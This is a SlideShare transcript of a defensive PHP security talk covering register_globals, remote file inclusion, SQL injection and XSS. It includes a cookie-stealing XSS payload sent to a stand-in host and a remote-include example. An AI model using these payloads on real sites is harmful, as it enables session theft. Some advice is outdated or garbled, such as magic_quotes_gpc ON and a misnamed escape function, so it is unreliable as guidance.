Php security

1,031 views

Published on

PHP Security Tech Talk

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,031
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
32
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Php security

  1. 2. <ul><li>Importance of PHP Security </li></ul><ul><li>Concerns of PHP Security </li></ul><ul><ul><li>Input Validation </li></ul></ul><ul><ul><li>Register Global </li></ul></ul><ul><ul><li>Code Injection </li></ul></ul><ul><ul><li>SQL injection </li></ul></ul><ul><ul><li>Cross-site Scripting (XSS) </li></ul></ul>
  2. 3. <ul><li>Protect server from crash </li></ul><ul><li>Prevent malicious user have root access </li></ul><ul><li>Protect customer data </li></ul>
  3. 4. <ul><li>All User Inputs are unreliable and can’t be trusted </li></ul><ul><li>Solution: </li></ul><ul><ul><li>Need to Validate any user input before use </li></ul></ul><ul><ul><li>Validation on the client side is good for the user </li></ul></ul><ul><ul><li>Validation on the server side is good for security </li></ul></ul>
  4. 5. <ul><li>When “ register_globals” is set ON, un-initialized variable can be injected via user inputs </li></ul><ul><li>Example </li></ul><ul><ul><li><?php </li></ul></ul><ul><li>if(authenticate_user()) { </li></ul><ul><li>$authenticated = true; } </li></ul><ul><li>- - - - - </li></ul><ul><li>if($authenticated) { </li></ul><ul><li>die(“Authentication required”); } </li></ul><ul><li>?> </li></ul><ul><li>If set $authenticated to 1 via GET, http://ffs.com/admin.php?authenticated=1 </li></ul>
  5. 6. <ul><li>Set “ register_globals” Off in php.ini(Disabled by default in versions >= 4.1.0) </li></ul><ul><li>Alternative to Register Global : SUPER GLOBALS </li></ul><ul><ul><li>$_GET – data from get requests </li></ul></ul><ul><ul><li>$_POST – post request data </li></ul></ul><ul><ul><li>$_COOKIES – cookie information </li></ul></ul><ul><ul><li>$_FILES – upload file data </li></ul></ul><ul><ul><li>$_SERVER - server data </li></ul></ul><ul><ul><li>$_ENV – environment variable </li></ul></ul><ul><ul><li>$_REQUEST – mix of GET, POST, COOKIE </li></ul></ul>
  6. 7. <ul><li>Dynamic paths/files used in require/include statements </li></ul><ul><li>Example: </li></ul><ul><ul><li><?php </li></ul></ul><ul><ul><li> include “{$_GET[‘path’]}/script.php”; </li></ul></ul><ul><ul><li>?> </li></ul></ul><ul><ul><li> I f set $path to “http://www.hackers.com” via GET, </li></ul></ul><ul><ul><li> <?php </li></ul></ul><ul><ul><li> include “http://www.hackers.com/script.php”; </li></ul></ul><ul><li> ?> </li></ul><ul><li>Avoid using dynamic paths </li></ul><ul><li>Always use full path, defined by constants </li></ul>
  7. 8. <ul><li>Allow a Malicious SQL code on server </li></ul><ul><li>Allow Malicious user have root access </li></ul><ul><li>Removal of data </li></ul><ul><li>Modification of existing values </li></ul><ul><li>Denial of service </li></ul>
  8. 9. <ul><li>MYSQL Prepared Statement - using mysqli::prepare() </li></ul><ul><li>Validate input data before send to the database </li></ul><ul><li>addslashes(), mysql_real_escape() </li></ul><ul><li>magic_quotes_gpc - Set to ON </li></ul><ul><li>error_reporting - Set to E_ALL </li></ul><ul><li>display_error – Set to ON in development, OFF in production </li></ul><ul><li>log_errors – Set to ON in production </li></ul><ul><li>error_log – Set to the desired location of the error log </li></ul>
  9. 10. <ul><li>Inject HTML/Script in a page, Pass a request to another Site </li></ul><ul><li>Session take-over </li></ul><ul><li>Password theft </li></ul><ul><li>User tracking by 3 rd Parties </li></ul><ul><li>Example: </li></ul><ul><ul><li><script>document.location = &quot;http://cookiehaker.com/xss.php?&quot;+document.cookie</script> </li></ul></ul>
  10. 11. <ul><li>Server Side Validation for all Input Data </li></ul><ul><li>htmlspecialchars() – encodes ‘,”,<,>,& </li></ul><ul><li>htmlentities() – Convert all applicable chars to HTML entities </li></ul><ul><li>strip_tags() – Remove HTML and PHP tags </li></ul>
  11. 12. <ul><li>XSS Me - https://addons.mozilla.org/en-US/firefox/addon/7598/ </li></ul><ul><li>Web Developer Tool </li></ul><ul><ul><li>Firefox – https://addons.mozilla.org/en-US/firefox/addon/60/ </li></ul></ul><ul><ul><li>IE - http://www.microsoft.com/downloads/details.aspx? </li></ul></ul><ul><ul><li>FamilyID=E59C3964-672D-4511-BB3E-2D5E1DB91038 </li></ul></ul><ul><li>Firebug - https://addons.mozilla.org/en-US/firefox/addon/1843/ </li></ul>

×